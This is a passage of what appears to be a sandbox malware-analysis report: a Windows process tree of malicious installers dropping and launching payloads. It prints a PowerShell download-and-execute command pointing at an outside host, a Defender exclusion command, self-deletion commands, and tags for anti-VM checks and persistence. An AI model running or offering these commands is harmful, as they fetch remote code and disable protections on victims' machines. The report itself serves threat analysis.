  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command IEX(New-Object Net.Webclient).DownloadString('https://neutropharma.com/wp/wp-content/debug2.ps1')
      4⤵
      Blocklisted process makes network request
      PID:9680
- - C:\ProgramData\95DF.tmp.exe
    "C:\ProgramData\95DF.tmp.exe"
    3⤵
    PID:1272
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\sqlcmd.exe" >> NUL
    3⤵
    PID:9036
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1
      4⤵
      Adds Run key to start application
      Runs ping.exe
      PID:5648
- C:\Users\Admin\AppData\Local\Temp\RarSFX3\KiffAppE2.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX3\KiffAppE2.exe"
  2⤵
  PID:6036
- C:\Users\Admin\AppData\Local\Temp\RarSFX3\lower.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX3\lower.exe"
  2⤵
  - Checks computer location settings
  PID:1064
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1064 -s 452
    3⤵
    - Program crash
    PID:7588
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1064 -s 764
    3⤵
    - Program crash
    PID:7900
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1064 -s 772
    3⤵
    - Program crash
    PID:1116
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1064 -s 816
    3⤵
    - Program crash
    PID:9932
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1064 -s 824
    3⤵
    - Program crash
    PID:1324
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1064 -s 984
    3⤵
    - Program crash
    PID:10184
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1064 -s 988
    3⤵
    - Program crash
    PID:9068
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1064 -s 1168
    3⤵
    - Program crash
    PID:9444
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1064 -s 1340
    3⤵
    - Program crash
    PID:1360
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im "lower.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\RarSFX3\lower.exe" & exit
    3⤵
    PID:9824
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im "lower.exe" /f
      4⤵
      Kills process with taskkill
      PID:4340
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1064 -s 1340
    3⤵
    - Program crash
    PID:4648
- C:\Users\Admin\AppData\Local\Temp\RarSFX3\ss29.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX3\ss29.exe"
  2⤵
  PID:8140

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (4).exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (4).exe"
1⤵
- Adds Run key to start application
PID:1672
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\kino6747.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\kino6747.exe
  2⤵
  - Adds Run key to start application
  PID:9988
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\kino5308.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\kino5308.exe
    3⤵
    - Adds Run key to start application
    PID:7052
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kino5694.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kino5694.exe
      4⤵
      Adds Run key to start application
      PID:5204
    - - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bus6396.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bus6396.exe
        5⤵
        Modifies Windows Defender Real-time Protection settings
        Windows security modification
        
        PID:8592
    - - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\cor7640.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\cor7640.exe
        5⤵
        Modifies Windows Defender Real-time Protection settings
        Windows security modification
        
        PID:5628
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 1076
        6⤵
        Program crash
        
        PID:6796
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\dsq85s03.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\dsq85s03.exe
      4⤵
      Maps connected drives based on registry
      PID:9116
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 9116 -s 1948
        5⤵
        Program crash
        
        PID:7684
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\en777685.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\en777685.exe
    3⤵
    PID:10220
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ge386417.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ge386417.exe
  2⤵
  PID:3788

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (2).exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (2).exe"
1⤵
- Adds Run key to start application
PID:4360
- C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\zap7751.exe
  C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\zap7751.exe
  2⤵
  - Adds Run key to start application
  PID:2656
- - C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\zap9196.exe
    C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\zap9196.exe
    3⤵
    - Adds Run key to start application
    PID:8468
  - - C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\zap9710.exe
      C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\zap9710.exe
      4⤵
      Adds Run key to start application
      PID:8484
    - - C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\tz9517.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\tz9517.exe
        5⤵
        Modifies Windows Defender Real-time Protection settings
        Windows security modification
        
        PID:8784
    - - C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\v4630nF.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\v4630nF.exe
        5⤵
        Modifies Windows Defender Real-time Protection settings
        Windows security modification
        
        PID:8936
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8936 -s 1084
        6⤵
        Program crash
        
        PID:2368
  - - C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\w43kj59.exe
      C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\w43kj59.exe
      4⤵
      PID:6264
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6264 -s 1184
        5⤵
        Program crash
        
        PID:4540
- - C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\xeyVI11.exe
    C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\xeyVI11.exe
    3⤵
    PID:7780
- C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\y69TC67.exe
  C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\y69TC67.exe
  2⤵
  PID:7200

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (1).exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (1).exe"
1⤵
- Suspicious use of SetThreadContext
PID:8612
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
  2⤵
  PID:4680
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 8612 -s 356
  2⤵
  - Program crash
  PID:9548

C:\Users\Admin\Desktop\New folder\HeInstaller\v40.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\v40.exe"
1⤵
PID:9116
- C:\Windows\SysWOW64\Wbem\wmic.exe
  wmic csproduct get uuid
  2⤵
  PID:9640

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
1⤵
- Process spawned unexpected child process
PID:9152
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
  2⤵
  - Loads dropped DLL
  PID:8832
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 8832 -s 600
    3⤵
    - Program crash
    PID:6360

C:\Users\Admin\Desktop\New folder\HeInstaller\stpoeoeiej.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\stpoeoeiej.exe"
1⤵
- Suspicious use of SetThreadContext
PID:10032
- C:\Users\Admin\Desktop\New folder\HeInstaller\stpoeoeiej.exe
  "C:\Users\Admin\Desktop\New folder\HeInstaller\stpoeoeiej.exe"
  2⤵
  PID:7840

C:\Users\Admin\Desktop\New folder\HeInstaller\Setuр.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\Setuр.exe"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:9712

C:\Users\Admin\Desktop\New folder\HeInstaller\setup.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\setup.exe"
1⤵
- Checks computer location settings
PID:9792
- C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
  "C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe" exec hide C:\Users\Admin\AppData\Local\Temp\animecool.exe
  2⤵
  PID:1664
- - C:\Users\Admin\AppData\Local\Temp\animecool.exe
    C:\Users\Admin\AppData\Local\Temp\animecool.exe
    3⤵
    - Suspicious use of SetThreadContext
    PID:10064
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      4⤵
      PID:8260
- C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
  "C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe" exec hide C:\Users\Admin\AppData\Local\Temp\poxuipluspoxui.exe
  2⤵
  PID:6692
- - C:\Users\Admin\AppData\Local\Temp\poxuipluspoxui.exe
    C:\Users\Admin\AppData\Local\Temp\poxuipluspoxui.exe
    3⤵
    - Suspicious use of SetThreadContext
    PID:6624
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      4⤵
      PID:4312
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sdfsfs3wefdsfsdfsd.bat" "
        5⤵
        
        PID:3056
      - C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
        
        nig1r21312312.exe exec hide nig1r21312312.exe exec hide cock123123444.bat
        6⤵
        
        PID:5504
        
        C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
        
        nig1r21312312.exe exec hide cock123123444.bat
        7⤵
        Suspicious use of SetThreadContext
        
        PID:7264
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cock123123444.bat
        8⤵
        
        PID:3888
        
        C:\Users\Admin\AppData\Local\Temp\MisakaMikoto213213.exe
        
        MisakaMikoto213213.exe
        9⤵
        Suspicious use of SetThreadContext
        
        PID:2160
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
        10⤵
        
        PID:2308
        
        C:\Users\Admin\AppData\Local\Temp\cockcreator.exe
        
        cockcreator.exe
        9⤵
        
        PID:1732
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --allow-pre-commit-input --disable-background-networking --enable-features=NetworkServiceInProcess2 --disable-background-timer-throttling --disable-backgrounding-occluded-windows --disable-breakpad --disable-client-side-phishing-detection --disable-dev-shm-usage --disable-features=Translate,BackForwardCache,AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync --disable-hang-monitor --disable-ipc-flooding-protection --disable-popup-blocking --disable-prompt-on-repost --disable-renderer-backgrounding --disable-sync --force-color-profile=srgb --metrics-recording-only --no-first-run --enable-automation --password-store=basic --use-mock-keychain --enable-blink-features=IdleDetection --export-tagged-pdf --user-data-dir=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-6vTItu --headless --hide-scrollbars --mute-audio about:blank --disable-blink-features=AutomationControlled --remote-debugging-port=0
        10⤵
        Suspicious use of SetWindowsHookEx
        
        PID:7356
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-6vTItu /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-6vTItu\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-6vTItu --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffda4bc9758,0x7ffda4bc9768,0x7ffda4bc9778
        11⤵
        
        PID:9252
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-breakpad --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=1300 --field-trial-handle=1460,i,6534909048975820138,14353662858597923878,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:2
        11⤵
        
        PID:1000
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --enable-blink-features=IdleDetection --disable-blink-features=AutomationControlled --lang=en-US --device-scale-factor=1.5 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=3 --mojo-platform-channel-handle=2016 --field-trial-handle=1460,i,6534909048975820138,14353662858597923878,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:1
        11⤵
        
        PID:8848
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --disable-gpu-compositing --enable-blink-features=IdleDetection --disable-blink-features=AutomationControlled --lang=en-US --device-scale-factor=1.5 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2372 --field-trial-handle=1460,i,6534909048975820138,14353662858597923878,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:1
        11⤵
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:8188
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --headless --mojo-platform-channel-handle=3484 --field-trial-handle=1460,i,6534909048975820138,14353662858597923878,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:8
        11⤵
        
        PID:9060
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --headless --mojo-platform-channel-handle=3932 --field-trial-handle=1460,i,6534909048975820138,14353662858597923878,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:8
        11⤵
        Modifies registry class
        
        PID:1124
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --disable-gpu-compositing --enable-blink-features=IdleDetection --disable-blink-features=AutomationControlled --lang=en-US --device-scale-factor=1.5 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3508 --field-trial-handle=1460,i,6534909048975820138,14353662858597923878,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:1
        11⤵
        
        PID:7576
- C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
  "C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe" exec hide C:\Users\Admin\AppData\Local\Temp\govno312321412412.bat
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - Windows security modification
  PID:4676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 8832 -ip 8832
1⤵
PID:7324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 8612 -ip 8612
1⤵
PID:2596

C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe"
1⤵
PID:8444
- C:\Users\Admin\AppData\Local\Temp\is-NGLN6.tmp\is-B6NHC.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-NGLN6.tmp\is-B6NHC.tmp" /SL4 $50900 "C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe" 1775056 52736
  2⤵
  - Loads dropped DLL
  - Drops file in Program Files directory
  PID:5980

C:\Users\Admin\Desktop\New folder\HeInstaller\EBZfayui1.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\EBZfayui1.exe"
1⤵
PID:8492

C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:5176

C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
1⤵
PID:1828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1064 -ip 1064
1⤵
PID:6796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1064 -ip 1064
1⤵
PID:3576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1064 -ip 1064
1⤵
PID:7576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1064 -ip 1064
1⤵
PID:7372

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
1⤵
PID:9860
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\5975271bda\'"
  2⤵
  PID:1124
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\5975271bda\'
    3⤵
    PID:2096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1064 -ip 1064
1⤵
PID:8992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1064 -ip 1064
1⤵
PID:5588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1064 -ip 1064
1⤵
PID:8492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 1064 -ip 1064
1⤵
PID:5016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1064 -ip 1064
1⤵
PID:6128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1064 -ip 1064
1⤵
PID:4540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5628 -ip 5628
1⤵
PID:10012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 8936 -ip 8936
1⤵
PID:7060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 9116 -ip 9116
1⤵
PID:8896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 6264 -ip 6264
1⤵
PID:7640

C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
1⤵
PID:9780

C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
1⤵
PID:7700

C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
1⤵
- Checks computer location settings
PID:4312

C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
1⤵
PID:9852

C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
1⤵
PID:4516

C:\Users\Admin\AppData\Roaming\uciugwj
C:\Users\Admin\AppData\Roaming\uciugwj
1⤵
- Suspicious use of SetThreadContext
PID:9472
- C:\Users\Admin\AppData\Roaming\uciugwj
  C:\Users\Admin\AppData\Roaming\uciugwj
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:6488

C:\Users\Admin\AppData\Local\077c96e4-08ae-44b6-a3bc-f8b6583a336c\stpoeoeiej.exe
C:\Users\Admin\AppData\Local\077c96e4-08ae-44b6-a3bc-f8b6583a336c\stpoeoeiej.exe --Task
1⤵
- Suspicious use of SetThreadContext
PID:3960
- C:\Users\Admin\AppData\Local\077c96e4-08ae-44b6-a3bc-f8b6583a336c\stpoeoeiej.exe
  C:\Users\Admin\AppData\Local\077c96e4-08ae-44b6-a3bc-f8b6583a336c\stpoeoeiej.exe --Task
  2⤵
  PID:1932

C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
1⤵
PID:7812

C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
1⤵
PID:9240

C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
1⤵
PID:9668

C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
1⤵
PID:9916

C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
1⤵
PID:9292

C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
1⤵
PID:9840

C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
1⤵
PID:3848

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
PID:5728

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
PID:9068

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
PID:1064

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (3).exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (3).exe"
1⤵
- Checks computer location settings
PID:4516
- C:\Users\Admin\AppData\Local\Temp\RarSFX4\Crack.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX4\Crack.exe"
  2⤵
  - Checks computer location settings
  PID:8424
- - C:\Users\Admin\AppData\Local\Temp\RarSFX4\Crack.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX4\Crack.exe" -h
    3⤵
    PID:7760
- C:\Users\Admin\AppData\Local\Temp\RarSFX4\brg.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX4\brg.exe"
  2⤵
  - Suspicious use of SetThreadContext
  PID:6828
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe"
    3⤵
    - Loads dropped DLL
    PID:10056
- C:\Users\Admin\AppData\Local\Temp\RarSFX4\sqlcmd.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX4\sqlcmd.exe"
  2⤵
  - Checks computer location settings
  PID:9948
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://neutropharma.com/wp/wp-content/debug2.ps1')"
    3⤵
    PID:6816
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command IEX(New-Object Net.Webclient).DownloadString('https://neutropharma.com/wp/wp-content/debug2.ps1')
      4⤵
      Blocklisted process makes network request
      PID:7812
- - C:\ProgramData\2FE.tmp.exe
    "C:\ProgramData\2FE.tmp.exe"
    3⤵
    PID:8548
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX4\sqlcmd.exe" >> NUL
    3⤵
    PID:4704
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1
      4⤵
      Runs ping.exe
      PID:6372
- C:\Users\Admin\AppData\Local\Temp\RarSFX4\KiffAppE2.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX4\KiffAppE2.exe"
  2⤵
  PID:8964
- C:\Users\Admin\AppData\Local\Temp\RarSFX4\lower.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX4\lower.exe"
  2⤵
  - Checks computer location settings
  PID:10100
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 10100 -s 456
    3⤵
    - Program crash
    PID:8428
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 10100 -s 764
    3⤵
    - Program crash
    PID:5676
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 10100 -s 772
    3⤵
    - Program crash
    PID:9248
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 10100 -s 816
    3⤵
    - Program crash
    PID:8144
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 10100 -s 860
    3⤵
    - Program crash
    PID:3984
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 10100 -s 984
    3⤵
    - Program crash
    PID:9688
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 10100 -s 1016
    3⤵
    PID:9964
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 10100 -s 1372
    3⤵
    PID:9868
- - C:\Windows\SysWOW64\cmd.exe
